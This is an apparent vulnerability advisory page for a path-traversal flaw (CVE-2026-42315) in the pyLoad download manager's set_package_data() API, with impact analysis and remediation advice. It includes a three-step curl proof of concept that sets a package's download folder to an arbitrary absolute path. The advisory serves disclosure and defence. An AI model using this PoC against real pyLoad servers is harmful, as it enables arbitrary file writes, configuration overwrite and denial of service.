Skip to main content

pyLoad CVE-2026-42315

HIGH
Path Traversal (CWE-22)
2026-05-05 https://github.com/pyload/pyload GHSA-838g-gr43-qqg9
8.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 21:46 vuln.today
Analysis Generated
May 05, 2026 - 21:46 vuln.today

DescriptionGitHub Advisory

Summary

No sanitization of package folder name allows writing files anywhere outside the intended download directory.

Affected Component
  • src/pyload/core/api/__init__.py
  • Function: set_package_data()

Details

When passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.

PoC

  1. Create a package, note response package ID e.g. 5
curl -X 'POST' \
  'http://localhost:8000/api/add_package' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "name": "set_package_data_exploit_poc",
  "links": [
    "http://example.com/file.txt"
  ],
  "dest": 1
}'
  1. Call set_package_data for this package ID with an arbitrary directory
curl -X 'POST' \
  'http://localhost:8000/api/set_package_data' \
  -H 'accept: */*' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "package_id": 5,
  "data": {
    "_folder": "/users/root/"
  }
}'
  1. New download folder will be set without any checks
curl -X 'GET' \
  'http://localhost:8000/api/get_queue' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>'

Response:

[
  {
    "pid": 5,
    "name": "set_package_data_exploit_poc",
    "folder": "/users/root/",
    "site": "",
    "password": "",
    "dest": 1,
    "order": 1,
    "linksdone": 0,
    "sizedone": 0,
    "sizetotal": 0,
    "linkstotal": 1,
    "links": null,
    "fids": null
  }
]

Impact

Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.

AnalysisAI

Absolute path traversal in pyLoad download manager allows authenticated users to write files to arbitrary filesystem locations via unsanitized package folder names in the set_package_data() API function. Users with Perms.MODIFY can redirect downloads to sensitive directories (e.g., /etc, /root, system directories) bypassing intended download directory restrictions, enabling configuration overwrite or denial of service through disk exhaustion. Publicly available exploit code exists with complete proof-of-concept in the GitHub security advisory. CVSS 8.1 (High) reflects high integrity and availability impact limited by low-privilege authentication requirement.

Technical ContextAI

This vulnerability resides in pyLoad's REST API implementation (src/pyload/core/api/__init__.py), specifically the set_package_data() function which manages download package metadata. PyLoad is a Python-based download manager supporting multiple file hosting services. The flaw is a classic CWE-22 Absolute Path Traversal resulting from complete absence of input validation on the _folder parameter. When a package's download destination is set via the API, the user-supplied folder path is directly accepted without canonicalization, sanitization, or validation against a base directory. The affected component processes pip package pyload-ng versions <=0.5.0b3.dev99. Normal operation expects folder paths relative to the configured download directory, but the missing validation allows absolute paths (e.g., /var/www, /etc/cron.d) to be specified. Subsequent download operations will write files to the attacker-controlled location with the privileges of the pyLoad process, typically a dedicated service account but potentially more privileged depending on deployment.

RemediationAI

Upgrade pyload-ng to version 0.5.0b3.dev100 or later, which implements input sanitization for the _folder parameter in set_package_data() per the GitHub security advisory at https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9. Apply the patch using pip: 'pip install --upgrade pyload-ng>=0.5.0b3.dev100'. If immediate patching is not feasible, implement the following compensating controls with noted trade-offs: (1) Restrict API access by revoking Perms.MODIFY from untrusted users and enforcing principle of least privilege on API keys - this prevents exploitation but reduces legitimate administrative functionality for affected users. (2) Run the pyLoad process in a restricted chroot jail or containerized environment with minimal filesystem write permissions - limits blast radius of successful exploitation to the container scope but requires infrastructure changes and may break legitimate download functionality if storage is mounted incorrectly. (3) Deploy web application firewall rules to block API requests to /api/set_package_data containing absolute path indicators (leading /, ../, Windows drive letters) in the _folder field - may be bypassed by encoding techniques and requires regex maintenance. Each workaround carries operational overhead; patching remains the definitive solution.

Share

CVE-2026-42315 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy